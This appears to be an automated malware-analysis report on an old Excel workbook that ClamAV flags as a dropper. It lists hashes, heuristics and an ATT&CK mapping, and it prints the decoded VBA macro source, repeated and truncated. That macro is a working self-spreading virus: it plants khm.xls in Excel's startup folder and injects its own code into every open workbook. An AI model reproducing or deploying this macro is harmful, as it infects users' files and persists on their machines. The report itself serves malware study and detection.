Office (OLE) malware analysis — malicious · be9419bad263f6f2

MALICIOUS

Office (OLE)

194.5 KB Created: 2000-05-23 08:07:03 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 5e351fe8b978589f473faae00fde2c8f SHA-1: 3cc7f2e2f72b21b315222b432148cf96a6726f30 SHA-256: be9419bad263f6f2b6df70acd59793c36a3f01d0dbd16e355d0372b40632dbd8

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical ClamAV heuristic indicates this is a dropper, and the VBA macro code confirms this by attempting to create a file named 'khm.xls' in the Excel startup path and injecting its own code into it. This suggests a persistence mechanism. The document body content appears to be related to shipping rate negotiations, which is likely a lure.

Heuristics 2

ClamAV: Xls.Dropper.Agent-1501583 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-1501583
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20003 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20003 bytes
SHA-256: `f650c2b9d4109aaaeed5e44cecf7a9e69fc966cda86ad7d10c80ae3df1d1a3cb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) On Error Resume Next flag = False 'xlstart폴큱EStartupPath)에 " khm.xls "가 없으툈E새로 만든다." myfile = Dir(Application.StartupPath & "\khm.xls") If myfile <> "khm.xls" Then Application.ScreenUpdating = False Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False End If 'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E For i = 1 To Workbooks.Count eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline) '코드가 없는 Component를 찾아서 vcode변수값을 입력 For j = 1 To Workbooks(i).VBProject.VBComponents.Count vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode) Next j: Next i If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) On Error Resume Next flag = False 'xlstart폴큱EStartupPath)에 " khm.xls "가 없으툈E새로 만든다." myfile = Dir(Application.StartupPath & "\khm.xls") If myfile <> "khm.xls" Then Application.ScreenUpdating = False Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False End If 'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E For i = 1 To Workbooks.Count eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline) '코드가 없는 Component를 찾아서 vcode변수값을 입력 For j = 1 To Workbooks(i).VBProject.VBComponents.Count vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode) Next j: Next i If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True End Sub Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) On Error Resume Next flag = False 'xlstart폴큱EStartupPath)에 " khm.xls "가 없으툈E새로 만든다." myfile = Dir(Application.StartupPath & "\khm.xls") If myfile <> "khm.xls" Then Application.ScreenUpdating = False Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False End If 'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E For i = 1 To Workbooks.Count eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline) '코드가 없는 Component를 찾아서 vcode변수값을 입력 For j = 1 To Workbooks(i).VBProject.VBComponents.Count vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines If vcount = 0 Then Workbooks(i).VBProject.VBCo ... (truncated)

SHA-256: f650c2b9d4109aaaeed5e44cecf7a9e69fc966cda86ad7d10c80ae3df1d1a3cb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)
On Error Resume Next
flag = False
 
'xlstart폴큱EStartupPath)에 "
khm.xls "가 없으툈E새로 만든다."
 myfile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'코드가 없는 Component를 찾아서 vcode변수값을 입력
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)
On Error Resume Next
flag = False
 
'xlstart폴큱EStartupPath)에 "
khm.xls "가 없으툈E새로 만든다."
 myfile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'코드가 없는 Component를 찾아서 vcode변수값을 입력
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)
On Error Resume Next
flag = False
 
'xlstart폴큱EStartupPath)에 "
khm.xls "가 없으툈E새로 만든다."
 myfile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component에 코드가 있으툈Evcode변수에 코드를 저픸E
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'코드가 없는 Component를 찾아서 vcode변수값을 입력
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBCo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.